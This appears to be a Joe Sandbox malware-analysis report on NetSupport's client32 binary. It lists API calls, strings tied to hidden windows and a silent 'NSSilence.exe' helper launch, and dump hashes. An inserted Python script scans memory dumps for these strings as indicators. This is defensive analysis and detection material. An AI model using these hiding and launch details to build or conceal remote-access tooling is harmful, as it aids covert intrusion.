• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
• API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
• String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 2014016395-1677429133
• Opcode ID: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
• Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
• Opcode Fuzzy Hash: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
• Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5
APIs
• GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
• ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
• API ID: ErrorLastShowWindow
• String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
• API String ID: 3252650109-4091810678
• Opcode ID: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
• Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
• Opcode Fuzzy Hash: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
• Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
APIs
• LoadLibraryA.KERNEL32(Wtsapi32.dll,1EF76653,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
• GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
• GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
• GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastLibraryProc$Free$Load
• String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
• API String ID: 2188719708-2019804778
• Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
• Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
• Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
• Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
APIs
  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
• GetDlgItem.USER32(?,00000472), ref: 1103F557
  • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
  • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
• wsprintfA.USER32 ref: 1103F5D1
• GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
• EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
• SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
• SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
• MessageBeep.USER32(00000000), ref: 1103F696
  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
• String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 1300213680-78349004
• Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
• Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
• Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
• Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
APIs
• wsprintfA.USER32 ref: 1105F251
• wsprintfA.USER32 ref: 1105F265
  • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,76968400,?,?,1105F29C,80000001), ref: 110ED59B
  • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
• wsprintfA.USER32 ref: 1105F5D6
  • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
• String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 273891520-33395967
• Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
• Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
• Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
• Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf
• String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
• API String ID: 2111968516-2092292787
• Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                                                    • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                                                                                    • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                                                                                    • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
APIs
• GetTickCount.KERNEL32 ref: 110695BD
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
• EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
• Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
• GetTickCount.KERNEL32 ref: 11069621
• wsprintfA.USER32 ref: 11069651
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
• LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
Strings
• CloseTransports slept for %u ms, xrefs: 11069630
• ..\ctl32\Connect.cpp, xrefs: 11069661
• idata->n_connections=%d, xrefs: 1106964B
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
• String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
• API String ID: 2285713701-3017572385
• Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
• Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
• Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
• Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
APIs
  • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
  • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
  • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
• CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
• _strrchr.LIBCMT ref: 1100D6EF
• GetCurrentProcessId.KERNEL32 ref: 1100D6FF
• wsprintfA.USER32 ref: 1100D720
• _memset.LIBCMT ref: 1100D731
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
• CloseHandle.KERNEL32(?,00000000), ref: 1100D781
• CloseHandle.KERNEL32(?), ref: 1100D78A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
• String ID: %sNSSilence.exe %u %u$D
• API String ID: 1760462761-4146734959
• Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
• Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
• Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
• Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
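Added example, not part of the Joe Sandbox report and not NetSupport's own code. The two function records above leave strings in the client32 image that an incident responder can key on: the format string `%sNSSilence.exe %u %u` that wsprintfA fills in just before CreateProcessA (GetModuleFileNameA plus _strrchr supply the module directory, GetCurrentProcessId the first %u; the page does not show what the second %u is, and the code below does not guess), and the `..\ctl32\Connect.cpp`, `CloseTransports slept for %u ms` and `idata->n_connections=%d` diagnostics from the transport shutdown loop. Two details of the NSSilence record are worth noting while reading it: the event's security descriptor is built with bDaclPresent = 1 and pDacl = NULL (a NULL DACL on an unnamed, auto-reset event, since lpName is 0), and CreateProcessA is called with bInheritHandles = 1 and dwCreationFlags = 0x04000000 (CREATE_DEFAULT_ERROR_MODE), so the helper process inherits that handle. The script scans a raw memory dump for the markers, rebases offsets to the dump's load address (0x11000000 for this image), and recovers any instantiated NSSilence.exe command line. The sample image, including the path C:\Temp\client\, is constructed for the demonstration.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# String markers copied from the client32 function records above. Each is the
# format string as it sits in the image, paired with the behaviour it belongs to.
MARKERS = {
    b"%sNSSilence.exe %u %u": "builds the NSSilence.exe command line before CreateProcessA",
    b"CloseTransports slept for %u ms": "CloseTransports shutdown delay loop (Connect.cpp)",
    b"..\\ctl32\\Connect.cpp": "NetSupport ctl32 source path left in a diagnostic string",
    b"idata->n_connections=%d": "connection-count diagnostic in Connect.cpp",
}

# Instantiated command line: "<module directory>NSSilence.exe <decimal> <decimal>".
# The first %u is taken to be the caller's PID because GetCurrentProcessId precedes
# wsprintfA in the record; the meaning of the second %u is not shown on the page.
NSSILENCE_CMDLINE = re.compile(rb"([A-Za-z]:\\[^\x00\r\n]*?NSSilence\.exe) (\d+) (\d+)")


@dataclass(frozen=True)
class Hit:
    marker: str
    address: int
    description: str


def scan(image: bytes, base: int = 0) -> list[Hit]:
    """Return every marker occurrence in `image`, with offsets rebased to `base`."""
    hits: list[Hit] = []
    for marker, description in MARKERS.items():
        start = 0
        while (idx := image.find(marker, start)) >= 0:
            hits.append(Hit(marker.decode("latin-1"), base + idx, description))
            start = idx + 1
    return sorted(hits, key=lambda h: h.address)


def find_nssilence_cmdlines(image: bytes) -> list[tuple[str, int, int]]:
    """Recover concrete NSSilence.exe command lines from a process memory dump."""
    return [(path.decode("latin-1"), int(a), int(b))
            for path, a, b in NSSILENCE_CMDLINE.findall(image)]


def is_netsupport_client(hits: list[Hit], min_distinct: int = 2) -> bool:
    """Require several distinct markers so one stray string does not trigger a verdict."""
    return len({h.marker for h in hits}) >= min_distinct


# Constructed sample standing in for a dump of the 0x11000000 image; not taken from the report.
SAMPLE_IMAGE = (
    b"\x00" * 16
    + b"%sNSSilence.exe %u %u\x00D\x00"
    + b"\x00" * 8
    + b"CloseTransports slept for %u ms\x00"
    + b"..\\ctl32\\Connect.cpp\x00"
    + b"idata->n_connections=%d\x00"
    + b"\x00" * 8
    + b"C:\\Temp\\client\\NSSilence.exe 4120 1024\x00"  # hypothetical instantiated command line
    + b"\x00" * 16
)

if __name__ == "__main__":
    hits = scan(SAMPLE_IMAGE, base=0x11000000)
    for h in hits:
        print(f"{h.address:08X}  {h.marker!r:40}  {h.description}")
    print("NSSilence command lines:", find_nssilence_cmdlines(SAMPLE_IMAGE))
    print("NetSupport client32 markers present:", is_netsupport_client(hits))
```

Run it against the `.sdmp` files listed under Memory Dump Source (read the file as bytes and pass the dump's base address) to locate the same strings in the real image; the command-line regex is only useful on a dump of the running process, since the format string alone never contains a drive letter.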
APIs
• CreateSolidBrush.GDI32(?), ref: 1100306D
• GetStockObject.GDI32(00000007), ref: 11003089
• SelectObject.GDI32(?,00000000), ref: 1100309A
• SelectObject.GDI32(?,?), ref: 110030A7
• InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
• GetSysColor.USER32(00000004), ref: 110030EB
• SetBkColor.GDI32(?,00000000), ref: 110030F6
• Rectangle.GDI32(?,?,?,?,?), ref: 11003110
• SelectObject.GDI32(?,?), ref: 1100311E
• SelectObject.GDI32(?,?), ref: 11003128
• DeleteObject.GDI32(?), ref: 1100312E
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
• String ID:
• API String ID: 4121194973-0
• Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
• Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
• Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
• Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
APIs
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
• std::exception::exception.LIBCMT ref: 1113F7AB
• __CxxThrowException@8.LIBCMT ref: 1113F7C0
• SetPropA.USER32(?,?,00000000), ref: 1113F84E
• GetPropA.USER32(?), ref: 1113F85D
• wsprintfA.USER32 ref: 1113F88F
• RemovePropA.USER32(?), ref: 1113F8C1
Strings
